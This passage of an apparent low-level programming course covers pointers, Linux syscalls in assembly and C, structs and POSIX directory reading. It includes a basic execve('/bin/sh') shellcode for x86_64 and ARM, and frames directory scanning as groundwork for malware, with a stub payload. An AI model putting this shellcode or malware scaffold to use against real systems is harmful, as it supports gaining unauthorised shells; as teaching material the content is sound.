102 | This becomes a bit more tricky if instead of a 32 bits memory chip you use four 8 bits memory chips. For instance, check Intel processors datasheet. From the 80386 and on you will see that the lower bits of the data bus are nor directly mapped to these `AX` pins. You have to look for `BE#X` pins or `REQ#X` depending on the processor version.
103 | 
104 | As you can see, what I had described is just a very simplified example to illustrate how a processor works in a more efficient way when it only has to deal with its native internal word size. The reality is more complex and unless you need to design your own computer (the motherboard at least), it does not really matter (specially with the large cache memory nowadays). 
105 | 
106 | 
107 | ## Little/Big Endian
108 | So, now, we'll always try to read data from memory using the native word size of our processor (not really but the compiler will do that for us). Let's assume the native word size is 4 bytes (32bits processor). The question now is: How are those bytes mapped between the memory and our registers?.
109 | 
110 | Let's assume the following memory layout:
111 | 
112 | 
113 |     |  ...   | Drawer ...
114 |     +--------+
115 |     |  0x44  | p +  3
116 |     +--------+
117 |     |  0x33  | p + 2
118 |     +--------+
119 |     |  0x22  | p +  1
120 |     +--------+
121 |     |  0x11  | p
122 |     +--------+
123 | 
124 | Let's assume too, that we want to read the content of address `p`, in register `eax`. Which value do you think you will get in the `eax` register?
125 | 
126 | `0x44332211` or `0x11223344`
127 | 
128 | The answer is: it depends. It depends on your processor. If your processor is `Little Endian` you will get the first value. Otherwise, if your processor if `Big Endian` you will get the second value. We have met the `Endianness`.
129 | 
130 | In general, you do not care about your processor Endianness. You just write and read your values to/from memory and the processor will do the right thing. Endianness becomes important when you have to interchange data with computers that may have a different endianness. This happens very often in network programming when using Open protocols that have to work with any kind of machine. 
131 | 
132 | Enough introduction. Let's see how all this concepts can be of any practical use.
133 | 
134 | # Pointers
135 | LoL. You may be thinking: _OMG!, this guy is gonna kill me. Everybody says that pointers are the most tricky part of C programming and he is just starting with this. Really, man, I give up_.
136 | 
137 | OK guys. Do not give up. You will see, in a sec that this is a lot simpler that you think. Furthermore, if you are doing assembly programming... well, you cannot do much without using pointers.... Just repeat to yourself:  I have to go through this to finally understand those shellcodes everybody talks about... Repeated again... again... are you ready now?
138 | 
139 | So, what is a pointer again?. A pointer is just a position of memory that contains the address of another position of memory. :dizzy_face:
140 | 
141 | The first thing you may figure out from that cryptic recursive definition is that, a pointer have to have a size equal to the number of `Ax` pines in the processor. In other words, it has to have the size of the address bus of the processor.
142 | 
143 | In plain words. A 32bits processor with a 32bits address bus (i.e a intel 386) will require 32bits to store any potential memory address any program can ever reference. The same for a 64bits processor with a 64bits address bus, a pointer will need 8 bytes to reference any possible memory address. In this last case, for a 64bits processor, we need 8 bytes to cover possible value the processor can output in the address bus (the so-called addressing space) and therefore a pointer is stored in 8 consecutive address positions. (Again, this can become a bit more complicated in reality, but this concept is enough for now).
144 | 
145 | Let's see this with an example. Imagine the following memory layout:
146 | 
147 | 
148 |     |  ...   | p + 4 = 0x400004
149 |     +--------+
150 |     |  0x40  | p + 3 = 0x400003
151 |     +--------+
152 |     |  0x00  | p + 2 = 0x400002
153 |     +--------+
154 |     |  0x00  | p + 1 = 0x400001
155 |     +--------+
156 |     |  0x04  | p     = 0x400000
157 |     +--------+
158 | 
159 | The example above show a 32bits pointer at address (0x400000) pointing to address 0x400004 on a 32bits little endian machine. A memory address storing a memory address.
160 | 
161 | # Hello World
162 | _"Fine, all that stuff is really confusing. Give me an example to understand what you are talking about..."_ Sure, there you go, the _Hello World_ program.
163 | 
164 | I'm pretty sure you know the "Hello World" program, but in case you don't, this is a very simple program that shows the message "Hello World" in the console. 
165 | 
166 | The way to do this on Linux is to write to the **standard output** (the console). The standard output is known by the system as the file descriptor `1` for any process... We will go in detail on file descriptors later in the course, for now, you just need to know that if you pass `1` as first parameter to the system call `write` you will be writing to the console.
167 | 
168 | So, knowing that the `write` system call is known by Linux as 1 (on a x86_64 arch), and applying everything we have already learn, this is how our little program will look like:
169 | 
170 | ```nasm
171 | 	global _start
172 | _start: mov rax, 1    ; SYS_write = 1
173 | 	mov rdi, 1    ; fd = 1
174 | 	mov rsi, msg  ; buf = msg 
175 | 	mov rdx, 13   ; count = 13 (the number of bytes to write)
176 | 	syscall  ; (SYS_write = rax(1), fd = rdi (1), buf = rsi (msg), count = rdx (13))  
177 | 
178 | 	;;  Exit program
179 | 	mov rax, 0x3c  ; SYS_exit = 0x3c
180 | 	mov rdi, 0     ; status = 0
181 | 	syscall ; (SYS_exit = rax (0x3c), status = rdi (0))
182 | 	
183 | msg:	db 'Hello World!',0x0a
184 | ```
185 | 
186 | I hope you can identify the two system calls in there. The first one to write the message, and the second one to exit the program with status 0.  If you do not know how to compile the program, you need to go back and check Part I of this course.
187 | 
188 | # Labels and Assembler commands
189 | There are two new elements in our tiny program. The first one is a label. A label is a name we can use to reference a part of our program (actually a memory position). In this case, the label `msg` is used to reference some data in memory, our "Hello World" message. In general, we do not know where in memory our program will be loaded, so using symbolic names let us write our programs without caring about that. Even if we use offsets to reference memory positions independently of our actual location in memory, labels will let us ask the compiler to calculate those offsets for us.
190 | 
191 | Actually, we've already seen this in the past.... can you spot the label we have been using so far? ... Anybody `_start`?
192 | 
193 | The second thing is that `db` instruction on the program. That is not a processor opcode, but an assembler instruction. Assembler instructions are only understood by the assembler, and does not directly translate into opcodes in the program. We already know one of those assembler instructions... Yes `global`.
194 | 
195 | The `db` assembler instruction probably stands for `Data Byte` (TBH I do not know for sure). It allows us to set some memory area with a sequence of bytes. In this case we can see two parts in the `db` instruction. The first part is a string. The assembler will output one byte per char starting at position `msg`. Then we can see an extra byte, separated by a comma, and expressed in hexadecimal. Sure, you can just put the decimal value (`10`) there and everything will stay the same. You can also write your string as a list of the ASCII values for each character separated by commas... but that is not very practical.
196 | 
197 | So, in this little program, where is our pointer?. We said that a pointer is a memory address that contains a memory address. In this case, the memory address is actually a register, specifically the register `rsi`. Do you remember that we said registers are just very fast memory within the processor that are referenced by a name?... well, if you are more comfortable changing the definition above to specifically also talk about registers that's fine. Anyway, I hope you have seen the point... er! ;)
198 | 
199 | # A C version
200 | Let's now try to write the C version for this program. It would look like this:
201 | 
202 | ```C
203 | #include <unistd.h>
204 | 
205 | int main ()
206 | {
207 |         register void *p = "Hello World!\n";
208 |         write (1, p, 13);
209 |         _exit (0);
210 | }
211 | 
212 | ```
213 | 
214 | Again, we can easily identify the two system calls in the program ( `write` and `_exit`). We already know that the second parameter to write has to be a pointer, a memory address containing the address, in memory, to the string to print. Let's take a look to the assembly generated by `gcc`:
215 | 
216 | 
217 |     $ objdump -d -M intel hello
218 |     (...)
219 |     0000000000400544 <main>:
220 |       400544:	55                   	push   rbp
221 |       400545:	48 89 e5             	mov    rbp,rsp
222 |       400548:	53                   	push   rbx
223 |       400549:	48 83 ec 08          	sub    rsp,0x8
224 |       40054d:	bb 5c 06 40 00       	mov    ebx,0x40065c
225 |       400552:	ba 0d 00 00 00       	mov    edx,0xd
226 |       400557:	48 89 de             	mov    rsi,rbx
227 |       40055a:	bf 01 00 00 00       	mov    edi,0x1
228 |       40055f:	e8 dc fe ff ff       	call   400440 <write@plt>
229 |       400564:	bf 00 00 00 00       	mov    edi,0x0
230 |       400569:	e8 c2 fe ff ff       	call   400430 <_exit@plt>
231 |     (....)
232 | 
233 | 
234 | Let's skip the first 4 instructions (that's the stack stuff that we haven't discussed yet), and let's try to find our pointer... Have you spot it?
235 | 
236 | Sure, you see how do we copy `rbx` into `rsi` after setting `ebx` (the 32bits part of `rbx`)  to `0x40065c`... and what is in there?... Let's check it
237 | 
238 |     $ gdb ./hello
239 |     (gdb) x/s 0x40065c
240 |     0x40065c:	 "Hello World!\n"
241 | 
242 | _Note: You have to run all commands above. You may get different addresses in your system_
243 | 
244 | # C pointers
245 | I guess you have already figure out how to declare a pointer in C. Sure, you have to use the `*`. However, in C we need to specify types. In this specific example it does not really makes a difference, but in the general case the pointer type is important and useful.
246 | 
247 | A C pointer is, therefore, declared this way:
248 | 
249 | ```C
250 | type *pointer;
251 | ```
252 | 
253 | This declares a pointer to a memory address containing a value of a certain type. So... which types does C knows. This is the list:
254 | 
255 |     char     Byte                 Minimal addressable element (not necessarily 8 bits)
256 |     int      Integer              Default integer type
257 |     short    Integer              Usually half of the default integer or equivalent to int
258 |     long     Integer              Usually double of the default integer or equivalent to int
259 |     float    Floating Point       Single Precision Floating Point   
260 |     double   Floating Point       Double Precision Floating Point
261 |     void     Nothing              Nothing or Anything
262 | 
263 | C also supports compound types, but we will not talk about those right now.
264 | 
265 | Confused again?. This is a simple program to figure out the size of each type in your system and better understand the difference between all those types:
266 | 
267 | ```C
268 | #include <stdio.h>
269 | int main ()
270 | {
271 | 	printf ("Size of void*  : %ld\n", sizeof(void*));
272 | 	printf ("Size of short  : %ld\n", sizeof(short));
273 | 	printf ("Size of int    : %ld\n", sizeof(int));
274 | 	printf ("Size of long   : %ld\n", sizeof(long));
275 | 	printf ("Size of float  : %ld\n", sizeof(float));
276 | 	printf ("Size of double : %ld\n", sizeof(double));
277 | 	return 0;
278 | }
279 | ```
280 | 
281 | The `stdio.h` at the beginning is required to use the function `printf`. The function `printf` (PRINT Formatted) lets us print messages using format strings to compose complex outputs. In this case, we are using the `%ld` format string to print the long value returned by `sizeof`. This basically tells `printf`, I have a number here that I want you to convert into a string... please do it.
282 | 
283 | We can add many of those `%` in the format string and provide additional parameters to the function to fill them. Check the `printf` man page for details about the format strings you can use with `printf`.
284 | 
285 | Finally, as you can imagine, `sizeof` returns the size, in bytes, of a given type or variable. 
286 | 
287 | In our test program we used a `void*` variable. This is a pointer to `void` what, for a pointer, means a raw pointer or a pointer to anything. This is actually the C equivalent to the assembly pointer we used in our ASM code.
288 | 
289 | We will come back to the C pointers later to fully understand the implications of pointer's type. But I think this is enough for now
290 | 
291 | # Your First Shellcode
292 | So, believe it or no, you have already learn all the bits and pieces to write a very basic shellcode.  A shellcode, in its simplest form, is a piece of code that starts a shell. It is usually feed into a vulnerable program using a exploit, effectively enabling the attacker to acquire a shell with the same privileges of the vulnerable program. In general an attacker will be targeting processes running as `root` to get full access to the machine.
293 | 
294 | In Linux, you can execute a process using the `exec` system call. This system call has 3 parameters, but for your first shellcode you can set to 0 the last two. The only parameter we need is the first one... a pointer to the name of the program to run.... that in this case would be `/bin/sh'.
295 | 
296 | ```nasm
297 | section .text
298 |         global _start
299 | 
300 | _start:
301 |         mov rax, 0x3b           ; SYS_exec
302 |         mov rdx, 0              ; No Env
303 |         mov rsi, 0              ; No argv
304 |         mov rdi, cmd            ; char *cmd
305 |         syscall
306 | 
307 | cmd:    db '/bin/sh',0
308 | 
309 | ```
310 | 
311 | Wow!... it is roughly the same program that the `Hello World` we wrote before!!!!. Are you missing the `exit` system call?... take a look to the exec man page (`man 2 exec`) to know why we do not need it any more.
312 | 
313 | ## `/bin/sh`
314 | You may be wondering: why `/bin/sh`?. I always use `bash`, or `dash`, or `zsh`, or `ksh`,...  Sure, you can run many different shells (command interpreters) but in almost any Unix out there, independently of the actual shell you usually use, you always will have `/bin/sh`. In general, it is a soft link to a real shell.
315 | 
316 | The reason for this, at least one of them, is that the system runs a lot of shell scripts for doing different things. You have shell scripts executed during the boot process, whenever you start or stop a service, when you launch some applications,... Imagine that whenever a user wants to change its default shell, the system will have to update all those scripts... what about the ones you wrote on your own, those the system knows nothing about... they will just break.
317 | 
318 | Therefore, as a convention, all Unix system have a binary at `/bin/sh` that runs a shell and all shell scripts rely on the existence of that file... Well... not all Unix system. Keep reading.
319 | 
320 | 
321 | # ARM Shell code
322 | So, we should be able to port our x86_64 asm shell code to ARM very easily. In case you are feeling lazy, this is how it may look like.
323 | 
324 | ```nasm
325 | .text
326 | .globl _start
327 | 
328 | _start:	mov r7, #11
329 | 	mov r1, #0
330 | 	mov r2, #0
331 | 	ldr r0,=msg
332 | 	swi #0
333 | 
334 | 
335 | .data
336 | msg:
337 | 	.asciz "/system/bin/sh"
338 | ```
339 | 
340 | have you seen it?... sure, this code is for Android. Android had mesh up the standard Linux disk tree, and the default shell is no longer at `/bin/sh` but at `/system/bin/sh`. If you are going to test the code in another ARM platform as a BeagleBone Black, a BananaPi or an Olinuxino running a standard Linux distro (usually Debian), just change the string to the well-known location `/bin/sh`. The rest of the code should just work.
341 | 
342 | We can compile it like this:
343 | 
344 |     $ arm-linux-gnueabi-as -o sh-arm.o sh-arm.s
345 |     $ arm-linux-gnueabi-ld -o sh-arm sh-arm.o
346 | 
347 | Let's take a closer look to the code. Did you notice it?. Yes, there are some differences when compared to our Intel code. This is for two reasons. The first one is that `NASM` only produces code for intel processors, so we cannot use it for ARM. You should had noted this before... I'm amaze nobody had asked about this from the previous parts. Anyways, the syntax of the GNU assembler (`as`) is slightly different. This one is known as AT&T assembly whereas the one used by `NASM` is known as Intel assembly... As a wannabe hacker you should learn both :P
348 | 
349 | So, the GNU assembler uses the assembler instruction `.asciz` to add a zero-terminated ASCII string to the memory. It is the same thing that the `nasm` `db`, but automatically adding the 0 at the end. The second comment is that we have to use `ldr` to load our pointer in our `r0` register.
350 | 
351 | Well, `ldr` is an ARM __pseudo-instruction__. The bottom line is that you cannot directly load 32bits values into a register in an ARM processor. I will not go into the details (you can google it), but roughly, ARM produces a very compact machine code, and tries to encode a lot of information on each 32bits machine code word, including the mnemonic parameters. This limits the size of the values that can be directly loaded into a register. The `ldr` pseudo instruction is expanded by the assembler in the right sequence of instruction to load a 32bits value in a register. There are more pseudo-instructions for ARM and we will go through them as needed.
352 | 
353 | The conclusion of all this is that, for ARM you have to use the syntax above to load a 32 bits constant or address (which in practical terms are the same thing) into a register.
354 | 
355 | # MIPS
356 | OK guys. My MIPS setup is so crappy that it is a pain to keep including it in this course. If any of you wants to contribute this section, just let me know. Until I get this development environment sorted out I will skip the MIPS sections from now on.
357 | 
358 | 
359 | # Conclusions
360 | In this part we have had our first encounter with pointers at the lowest level and we have learn how to use them together with a system call. Using these two simple concepts we manage to create a shell code. This shell code is not usable in the wild, but you will learn how to update it for practical purposes later in this course. If you cannot wait, check the @unh0lys0da   article here https://0x00sec.org/t/linux-shellcoding-part-1-0/289 or the read classical "Smashing the Stack for Fun and Profit" from Aleph one!
361 | 
362 | * PREVIOUS: [Programming for Wannabes. Part II and a half. Systemcalls (ARM and MIPS)](part-02.5.md)
363 | * NEXT: [Programming for Wannabes. Part IV. The Stack](part-04.md)
364 | 
365 | 


--------------------------------------------------------------------------------
/part-07.md:
--------------------------------------------------------------------------------
  1 | # Programming for Wanabes VII. Finding files I
  2 | It is time to get started with more advanced code. We will be introducing multiple concepts from this point on and hopefully we will boost our programming skills in no time. In the previous instalment we identified the ability to find files in the disk as a feature required by several malwares.
  3 | 
  4 | Actually it is a feature required by many other applications and will let us learn about new system calls, loops and structures. Without further ado, let's jump into the topic
  5 | 
  6 | # Getting Ready to Read directories
  7 | Whenever you need to read the content of a folder and you want to be portable between platforms, the right way to proceed is using the POSIX interface.
  8 | 
  9 | I will first dump here a shrink down version of the general program from the [previous instalment](https://0x00sec.org/t/programming-for-wannabes-part-vi-malware-introduction/25595/). In the rest of this text we will just work out the `select_target` functions. Everything else will stay the same for the time being. So, this is our starting point:
 10 | 
 11 | ```C
 12 | #include <stdio.h>
 13 | #include <stdlib.h>
 14 | #include <string.h>
 15 | #include <errno.h>
 16 | 
 17 | #include <sys/types.h>  // POSIX directoy reading interface
 18 | #include <dirent.h>
 19 | 
 20 | char *the_folder="/tmp/";
 21 | 
 22 | typedef int (*PAYLOAD_FUNC)(char *);
 23 | 
 24 | int payload (char *target) {
 25 |   printf ("Doing malware things to %s\n", target);
 26 | }
 27 | 
 28 | int select_target (PAYLOAD_FUNC pf) {
 29 |   return 0;
 30 | }
 31 | 
 32 | int main () {
 33 |   while (select_target(payload));
 34 | }
 35 | ```
 36 | 
 37 | No big surprises here, a bunch of include files with the functions and data structures we will need and the functions we introduced for our generic malware. The only tricky thing here is the definition of a function type. I introduced this silently in the previous instalment, but this time we should look deeper into this so you understand what we are doing.
 38 | 
 39 | ## Function Pointers
 40 | One of the data types that we can use in C are the so-called pointers. We had introduced them earlier in this series, but for completeness let's quickly define them again: a pointer is just a variable that contains a memory address. It is said that it _Points to_ that address, hence the name... _Pointer_.
 41 | 
 42 | Usually pointers point to addresses containing data (variable pointers), but there is no reason why a pointer wouldn't point to an address containing code... a function for instance. In assembly this is very straight forward, we just need to do `call/jmp` with some kind of indirect addressing (that is, using a register or variable that contains the address to jump into, instead of the direct address, so we can control that value programatically). Let's see this with an example
 43 | 
 44 |     DIRECT                 INDIRECT
 45 |                            mov    payload, %rax
 46 |     call payload           callq  *%rax
 47 | 
 48 | 
 49 | In the direct code we are using the `payload` address directly. In the indirect code we load the function address in a register and then we jump to the address stored in that register. In general, when you declare a function pointer variable, that pointer will be stored somewhere in the stack, and instead of loading the address directly on `RAX` (like in this example), we will load `RAX` with that stack value. 
 50 | 
 51 | Let's change the `select_address` above to actually call `payload` and let's take a look to the generated code:
 52 | 
 53 | ```C
 54 | int select_target (PAYLOAD_FUNC pf) {
 55 |   pf (the_folder);
 56 |   return 0;
 57 | }
 58 | ```
 59 | 
 60 | This produces the following assembler. You have to compile it with `-O2` so the code gets slightly optimised, otherwise, gcc will generate code to store the parameter (the function pointer) in the stack and just after that read that stack value and put it in `RAX`. In other words it just moves the parameter around doing nothing.
 61 | 
 62 | ```asm
 63 | 00000000000006c0 <select_target>:
 64 |  6c0:   48 83 ec 08             sub    $0x8,%rsp
 65 |  6c4:   48 89 f8                mov    %rdi,%rax
 66 |  6c7:   48 8b 3d 42 09 20 00    mov    0x200942(%rip),%rdi        # 201010 <the_folder>
 67 |  6ce:   ff d0                   callq  *%rax
 68 |  6d0:   31 c0                   xor    %eax,%eax
 69 |  6d2:   48 83 c4 08             add    $0
 70 |  6d6:   c3                      retq
 71 | 
 72 | ```
 73 | 
 74 | We already know all this, but let's refresh our minds once again:
 75 | 
 76 | * We get our parameter (the `payload` address in this case) in `RDI`
 77 | * We copy it into `RAX`
 78 | * Put the `the_folder` variable in  `RDI` (remember `RDI` contains the first parameter)
 79 | * Run the function indirectly (jump to the content of `RAX` that in this case is `payload`)
 80 | 
 81 | So, that's it. In this case we are using the pointer directly, but we could store it in memory and then we will be talking about a function pointer variable. This is obvious and straightforward in asm, but in C we need to use a kind of cryptic way to define function pointers:
 82 | 
 83 | ```C
 84 | return_type (*var/type) (parameters);
 85 | ```
 86 | 
 87 | So you just need to put parenthesis (and an `*`, after all we are defining a pointer) around the variable or type that you want to define. Let's see a few examples:
 88 | 
 89 | ```C
 90 | int (*func)(int, int);
 91 | ```
 92 | This declares a variable named `func` that is a pointer to a function returning an integer, and expecting two integers as parameters. 
 93 | 
 94 | ```C
 95 | typedef int (*FUNC)(int, int);
 96 | FUNC func;
 97 | ```
 98 | 
 99 | This renames a function pointer type (that is what `typepdef` does) to represent the same function we defined above. Then it declares the same variable but using the new type name. This makes the code more readable, but other than that, there is no difference at all.
100 | 
101 | Also note that the assembler generated to call our function (via the function pointer) is independent of the actual types in the declaration.... you can call the function with whatever you want... but the function will likely not work as expected, or even crash. The types definitions are just used by the compile to let us know that we are doing what we are suppose to do. Just change the type definition and recompile, you will get the same code.
102 | 
103 | 
104 | # Reading a directory the POSIX way
105 | 
106 | Now we can get back to the main topic, how to read the content of a directory. Remember, virus, ransomware, spyware, all of them need to scan the disk to find different types of files. Let's see how to do this.
107 | 
108 | We will start doing it the _Right Way_, that is, how it is expected to be done by any normal system application. And that is using the POSIX interface that is composed of three functions:
109 | 
110 |     opendir  Opens a directory for reading
111 |     readdir  Read one directory entry each time it is called
112 |     closedir Closes the directory
113 | 	
114 | This API is intended to mimic the normal file interface (the stream like interface offered by `fopen/fread/fclose`), but just using slightly different data structures. Using this function our `select_target` function will look like this:
115 | 
116 | ```
117 | int select_target (PAYLOAD_FUNC pf) {
118 |   struct dirent *de;
119 |   DIR           *d;
120 |   
121 |   if (!(d = opendir (_the_folder))) {perror ("opendir:"); exit (EXIT_FAILURE);}
122 | 
123 |   while (1) {
124 |       errno = 0;
125 |       if (!(de = readdir (d))) {
126 | 	    if (errno) perror ("readdir:");
127 | 	    break;
128 |       }
129 |       pf (de->d_name);
130 |     }
131 |   closedir (d);
132 |   return 0;
133 | }
134 | ```
135 | 
136 | The first thing to note is that, `DIR*` is the type used by all the function, it is similar to the classical `FILE*` that we use with files (when using the stream interface). Conceptually it is the same, a stream abstraction of a directory. The `opendir` and `closedir` are intended to intialise the structure and to finish the processing respectively (and release resources). Not much more to say about them, you need to call `opendir` before start reading the directory, and you have to call `closedir` whenever you are done processing your folder. Yes, the parameter to `opendir` is just a string containing the folder to process. We will see later what those functions really do under the hood.
137 | 
138 | The interesting function is `readdir` that is the one that actually reads directory entries one by one.
139 | 
140 | # `structs`
141 | Before looking into `readdir` in detail, we need to introduce a new C keyword: `struct`. A `struct` is a so-called compound type. It is a compound type because it is composed of other types. Each one of those types together with the new we give to them is known as a field. You can think about a `struct` like a variable that groups more variables together in a convenient way.
142 | 
143 | The way to declare them is like this:
144 | 
145 | ```C
146 | struct name_of_the_struct {
147 |   type1  field1;
148 |   type2  field2;
149 |   ....
150 | };
151 | ```
152 | 
153 | A more specific example could be:
154 | 
155 | ```C
156 | struct linux_dirent {
157 |   long           d_ino;
158 |   long           d_off;
159 |   unsigned short d_reclen;
160 |   char           d_name[];
161 | };
162 | 
163 | struct linux_dirent de,*pde;
164 | ```
165 | 
166 | The code above defines a new type named `struct linux_dirent` (note that you need to use `struct` to refer to the new type) composed of two longs (64bits integer), one short (16 bit integer) and a string of unknown size. You can add as many fields as you want, but in this case we are using only 4.
167 | 
168 | After the `struct` definition we have defined two variables. One is a `struct` and the other one is a pointer to a `struct`. Once the variables are declared, we can access the fields using the `.` for the struct one and the `->` operator for the pointer. Just like this:
169 | 
170 | ```C
171 | de.d_ino = 12345;
172 | de.d_off = 0;
173 | pde = &de;
174 | pde->d_ino = 54321;
175 | pde->d_off = 1;
176 | ```
177 | 
178 | Whenever you need to pass structs as parameters to function, it is usual to redefine them using `typedef`s in order to minimise the writing. Imagine a function that returns one of those `struct linux_dirent` structs and receives as parameter two of them. The prototype will look like:
179 | 
180 | ```C
181 | struct linux_dirent my_func (struct linux_dirent p1, struct linux_dirent p2);
182 | ```
183 | 
184 | This is a lot of writing and also it is harder to figure out the function prototype at one glance. Now imagine, you have 20 more function in your API to deal with this data type....So we could just create an _alias_ for this type:
185 | 
186 | ```C
187 | typedef struct linux_dirent LDIRENT;
188 | LDIRENT my_func (LDIRENT p1, LDIRENT p2);
189 | ```
190 | 
191 | Which is way more easy to read. However this is a matter of personal use. Both approaches will produce the same code. Some people prefers to write everything so it is always clear what is that type (a struct in this case), and other prefer to redefine them. In the standard C library you will find both.
192 | 
193 | _Note: It is not common (but indeed possible) to pass and return structs in C functions, usually you will use pointers instead. The reason is that C passes parameter by value. This means that all parameters we pass have to be copied. It is easier to copy 4/8 bytes for a pointer than the roughly 24 bytes required by the struct in our example._
194 | 
195 | All this may look  complicated at first glance, but you will get used to this very quickly. This data structures are all over the place when writing non trivial programs
196 | 
197 | However, in this course we are not just learning the syntax of C, we are going deeper.
198 | 
199 | # `structs` are just memory blocks
200 | So, what is really a `struct` ?. Short answer: It is just a memory block. When we declare a variable of type struct, we are just allocating enough space to contain all the struct elements either in the stack, in case our variable is local to a function, in the data segment, in case it is a global variable, or in the _Heap_ in case we allocate the memory block dynamically. This last case we will cover later in this course.
201 | 
202 | For our previous example we have:
203 | 
204 | ```C
205 | struct linux_dirent {
206 |   long           d_ino;      // 8 bytes
207 |   long           d_off;      // 8 bytes
208 |   unsigned short d_reclen;   // 2 bytes
209 |   char           d_name[];   // This is a placeholder we will talk about in a sec
210 | };
211 | ```
212 | 
213 | So, this structure requires 18 bytes, which will likely be rounded up to 24 bytes to keep the memory alignment (check previous instalments when we introduce the native word size). You can just add a `printf` using the `sizeof` operator to find out the actual size of the struct. In memory it will look like:
214 | 
215 | 
216 |     ADDR+18 -> | d_name
217 |     ADDR+16 -> | d_reclen (2 bytes) 
218 |     ADDR+8  -> | d_off    (8 bytes) 
219 |     ADDR   --> | d_ino    (8 bytes)
220 |                 +--------------
221 | 
222 | 
223 | When declaring a variable, such a variable just names that memory block... Think about it as a label, and therefore it is inmutable (you cannot change its value). It is the same with arrays... they are like pointers but not completely (we will talk about this again when arrays pop up in our way later in the course).
224 | 
225 | When you declare a pointer to a struct, you are just allocating memory to store an address that will point to memory block. Note that when declaring a pointer to an structure, the structure is not magically created. It is just a pointer. You need to allocate the memory block for the structure by other means.
226 | 
227 | You can now add the `struct` we defined above to your program (we will do that in a sec) and declare a local variable in the `select_file` function. Then take a look to the generated code. The beginning of the function will allocate extra space (the `sub $0xVAL,%rsp` at the beginning) to accommodate the new variable.
228 | 
229 | # What about the `d_name` field?
230 | 
231 | Many of you may be wondering this.... what does that `char d_name[]` means. Well, it is actually a placeholder. A field added to the `struct` to point to whatever comes after the rest of the fields. Or to get access to a specific point inside the struct if you prefer. This technique is used when the programmer needs to deal with variable length items. 
232 | 
233 | In this example we do not known how long the name of the directory entry will be. When this happens we usually have two options. We either provide enough space so the longest possible name will fit in our memory block (and/or we limit the longest possible name with additional checks in the code), or we dynamically allocate space for the directory entry whenever we find out its size. Allocations just don't happen magically... even on interpreted languages all these processes are happening under the hood... whenever you add two strings in python a lot of allocation and memory movement happens.
234 | 
235 | Let's see how would this work. Imagine we are allocating our structure in the stack. Note that the actual memory block is created/managed by the `readdir` function not for us. The function gives us a pointer to the memory it manages/allocates. As, for the time being, we only know how to allocate memory in the stack, let's assume `readdir` allocates memory in the stack, however it is likely to use some global storage or the heap. You should have an idea of the why at this point.
236 | 
237 | Also, let's assume, that the syscalls used by `readdir` (remember `readdir` is a libc function not a system call), will let us known the size of file name it is reporting. Let's imagine the length of the filename is `len`.
238 | 
239 | Then `readdir` will allocate in the stack 24 bytes + len, so there is enough space to store the `struct linux_dirent` fields plus the string. In this case the stack will look like this:
240 | 
241 |     ADDRS+18+len -> | \0
242 |     ADDRS+18     -> | d_name (the string goes here)
243 |     ADDRS+16     -> | d_reclen (2 bytes) 
244 |     ADDRS+8      -> | d_off    (8 bytes) 
245 |     ADDRS       --> | d_ino    (8 bytes)
246 |                     +--------------
247 | 
248 | Whenever we access the `d_name` field that is located at `ADDR+18`, we will find a variable length string containing the name of the file being read by `readdir`.
249 | 
250 | From a syntactic point of view `char d_name[]` represents a character string of unknown size. In practise it is just indicating the offset in the memory block holding the structure where the string will be.
251 | 
252 | This technique is also sometimes used in network programming when the length of the packet is unknown until the packet header is read and the field containing the packet size can be read.
253 | 
254 | # Reading the directory
255 | 
256 | Now that we know what a `struct` is, we can start using `readdir`. This function returns a pointer to a `struct dirent`. This type is defined in `#include <dirent.h>` and as you had already figure out the name comes from _DIRectory ENTry_.
257 | 
258 | So, each time we run `readdir` we will get the information of one of the files in the directory. We have to call it again and again until the whole directory is read. So, the question is: when should we stop?. Well, the answer, is in the `man` pages. Never underestimate the amount of information provided by the man pages. So this is what it says:
259 | 
260 |     RETURN VALUE
261 |            On  success, readdir() returns a pointer to a dirent structure.  (This structure
262 |            may be statically allocated; do not attempt to free(3) it.)
263 |     
264 |            If the end of the directory stream is reached, NULL is returned and errno is not
265 |            changed.   If  an error occurs, NULL is returned and errno is set appropriately.
266 |            To distinguish end of stream and from an error, set errno to zero before calling
267 |            readdir() and then check the value of errno if NULL is returned.
268 | 
269 | 
270 | Crystal clear. Now we can recall the main loop in our `select_target` function and look at it again:
271 | 
272 | ```C
273 |   while (1) {
274 |       errno = 0;
275 |       if (!(de = readdir (d))) {
276 | 	    if (errno) perror ("readdir:");
277 | 	    break;
278 |       }
279 |       pf (de->d_name);
280 |     }
281 | ```
282 | 
283 | We had already introduced the `while` loop in the past. It just loops _while_ the condition we set in the `while` is true. In this case, `while(1)` means that the loop will run forever, because the condition is always true (!= 0).
284 | 
285 | _NOTE:C doesn't has a boolean type. Conditional operators traditionally returns FALSE as 0 and TRUE as not zero. Setting the while condition to 1  means that it is always true. You could set it to 31173 and it will work the same, but why would you type 5 numbers when you can just type 1?._
286 | 
287 | Then we are prepared to call `readdir`. We set `errno` to zero as proposed in the man page, and call the function, if we get a `NULL` we fall into the `if`. Then we check again the `errno` variable and if it has changed we show and error. In either case, we had an error or we have reached the end of the list, we leave the while loop using `break`.
288 | 
289 | >NOTE: The expression we use above `if (!p)` is equivalent to `if (p == 0)` or if you prefer `if (p == NULL)`, the compiler will see that `p` is a pointer and will change 0 to a compatible representation of `NULL`. The way to write this is a matter of personal taste and some people says `if (!p)` is bad style, and some other say it is good.... Just do whatever better suits you, but be aware of what is going under the hood. The key point here is that NULL is a special value and doesn't need to be the integer 0. This may be confusing for the beginner. You can take a look to [the c faq NULL section](http://c-faq.com/null/) for details.
290 | 
291 | Otherwise, we access the field `d_name` in the struct `struct dirent` that contains the name of the directory entry returned by `readdir` and pass it to the `payload` function. 
292 | 
293 | # Reading directories with system calls
294 | 
295 | We have a working function able to read the content of a directory in the disk using the POSIX interface. Overall, when writing malware we would like to minimise application dependencies and in the extreme case that implies just using the OS and avoid all libraries... However this is not always possible.
296 | 
297 | In this case, instead of using the POSIX function we can use the associated Linux system call. This is perfectly fine, however the drawback is that the POSIX version will work with all POSIX compatible operating systems and the non-POSIX version will be Linux specific. In other words, all POSIX compatible system have the `opendir/readdir/closedir` functions but each one will have different system calls to access the directories. That is what standards are for.
298 | 
299 | > NOTE: That our program will work in any POSIX complaint system (Linux, NetBSD, OpenBSD, Solaris, MacOs...) means that we can recompile for those systems and the program will still work, it doesn't mean that any compiled version of our program will run magically in all POSIX compliant OSes
300 | 
301 | > NOTE2: Linux is not officially POSIX complaint. Despite of possible minor divergences the main issue is that POSIX certification, as most certifications out there, are really achieved by paying a fee...
302 | 
